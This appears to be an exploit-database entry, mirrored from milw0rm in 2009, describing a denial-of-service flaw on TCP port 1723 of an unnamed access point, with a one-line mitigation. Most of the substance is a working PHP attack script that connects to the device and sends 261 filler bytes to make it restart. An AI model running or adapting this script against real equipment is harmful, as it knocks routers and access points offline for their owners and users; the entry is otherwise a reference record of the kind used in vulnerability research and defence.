header-logo
Suggest Exploit
vendor:
N/A
by:
milw0rm.com
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Attacking port 1723(flood)

This exploit takes advantage of a vulnerability in port 1723 of a device, which allows an attacker to send a few bytes to the port and cause the device to restart almost instantly.

Mitigation:

Restricting access to port 1723 and using a firewall to block malicious traffic.
Source

Exploit-DB raw data:

Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP.
It takes a few bytes for the AP to automatically restart

<?php
$apaddr = "192.168.2.1";
$apport="1723";


$con = fsockopen($apaddr, $apport, $errno, $errstr);
if (!$con) {
    echo "$errstr ($errno)<br />\n";
} else {
    $trash = str_repeat("\x90","261");
    fwrite($con, $trash);
    while (!feof($con)) {
        echo "$trash \r\n";
    }
    fclose($con);
}
?> 

# milw0rm.com [2009-09-11]